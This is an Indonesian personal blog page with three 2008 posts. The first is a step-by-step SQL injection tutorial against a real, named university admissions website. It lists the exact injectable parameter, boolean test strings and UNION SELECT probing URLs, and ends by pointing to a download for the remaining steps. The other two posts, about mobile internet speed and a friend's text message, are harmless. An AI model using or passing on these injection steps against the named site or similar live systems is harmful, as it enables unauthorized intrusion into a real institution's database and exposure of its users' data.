Nginjek Siqil di Kampus Unmuh Malang

undefined undefined

Jumpa lagi dengan saya, seorang cupu & orang awam ttg dunia hacking. Kali ini saya akan menjelaskan bugs pada website UMM (Univ. Muhammadiyah Malang) dengan cara SQL Injection >:). Mudah-mudahan langkah yg saya jelaskan tidak salah. Ok, lanjut aja ga banyak bacot…

Buka http://pmb.umm.ac.id/ , sekarang pilih artikel apa aja pada website tersebut. Saya pilih artikel berita, yaitu http://pmb.umm.ac.id/?lihat=1&id_berita=116

Lalu tambahkan dibelakangnya “ and 1=0” (tanpa tanda petik), sehigga menjadi http://pmb.umm.ac.id/?lihat=1&id_berita=116 and 1=0, hal ini untuk mengetes apakah site tersebut bisa di inject atau ga’.

Ada yang aneh saat mebuka URL tersebut? Apakah tulisan pada halaman websitenya hilang?....

Lanjut, sekarang coba tambahkan dibelakangnya “ and 1=1” (tanpa tanda petik), sehingga menjadi http://pmb.umm.ac.id/?lihat=1&id_berita=116 and 1=1

Apakah ada perbedaan dengan yg kita lakukan tadi? Kalau ada perbedaan berarti website tersebut bisa di-inject >:)

Sekarang tambah alamat id-nya (-), menjadi http://pmb.umm.ac.id/?lihat=1&id_berita=-116

Lalu masukkan “union select 1--” --> http://pmb.umm.ac.id/?lihat=1&id_berita=-116 union select 1--

Masukkan lagi “union select 1,1--” --> http://pmb.umm.ac.id/?lihat=1&id_berita=-116 union select 1,1--

Lanjutkan langkah diatas dengan menambahkan angka 1 sampai keluar pada halaman site-nya angka 1 bederet, dan ternyata cukup sampai menambahkan 1-nya 4x udah muncul angka 1 bederet 3 biji, nih URLnya http://pmb.umm.ac.id/?lihat=1&id_berita=-116%20union%20select%201,1,1,1,1--


.... Penasaran? Kalo penasaran silahkan dibaca dg mendownload artikel tersebut disini

Bagi para master, saya tidak merekomendasikan untuk dibaca :D

5/20/2008 06:13:00 PM | | 0 Comments  

Ngenet pake Axis

undefined undefined

Tadi pagi bangun tidur, bingung mau ngapain. Mau garap skripsi tapi masih belum dapet referensi. Akhirnya ngenet aja ngabisin quota 100 Mbps -nya Axis sambil dengerin musik ajeb², Gimana bangsa Indonesia bisa maju kalo generasi mudanya ky' gini :D

Btw bagi yg belum tau kartu GSM Axis, bisa tau infonya disini . Gw cuman promosi buat ngenet aja, hehehe..

Mulai browsing,, agak kaget 'coz lumayan cepet biasanya lemot. Akhirnya coba ngetes konaksi pake speedtest, hasilnya:



Kepikiran mau download software, akhirnya nyoba pake IDM. Lumayan cepet, biasanya ga sampe dari 5 Kbps
























Cara yg gw lakukan diatas ga pake tool semacam toonel ataupun proxy~

5/09/2008 06:08:00 PM | | 0 Comments  

Sms dari seorang sahabat

undefined undefined

Bosen sama nih blog isinya ttg dunia maya semua. Kalo Luna Maya sih gpp gw mau :p
Gw mau curhat dikit ah :)

Semalem pulang kerja jam 11, begitu nyampe kos, shalat dulu trus langsung tidur. Keesokan harinya pas bangun tidur liat HP ada 3 sms yg masuk, salah satuya dari sohib. Pas gw buka tuh sms dari fadoly, agak sedikit kaget & terharu waktu baca. Ga nyangka aja, soalnya dia ga pernah ky’ gt. Biar ga penasaran ma isi smsnya, nih gw share:

Saat malam menjelang, Allah membuka pintu rahmat-Nya. Jika Ia bertanya: apa harapanmu? Akan kukatakan, “Jaga & lindungi sahabatku ini selalu dan selamanya tetap di jalanMu”.

Itu dia kirim pas jam 12 malem. Abiz gw baca, entah kenapa gw jadi kangen dia. Upz,, jangan salah sangka, gw masih normal koq, gw emang selalu kangen dg temen deket/sahabat gw entah itu cowok atau cewek. Terakhir ketemu dia pas acara meridnya 1 bulan yg lalu.

Karena bagi gw, sahabat adalah segalanya. Banyak pelajaran hidup yg gw ambil dari dia.

5/09/2008 03:52:00 PM | | 0 Comments  

Langganan: Postingan (Atom)


Statistics

Counter online counter Page Rank Check TopOfBlogs

100 Blog Indonesia Terbaik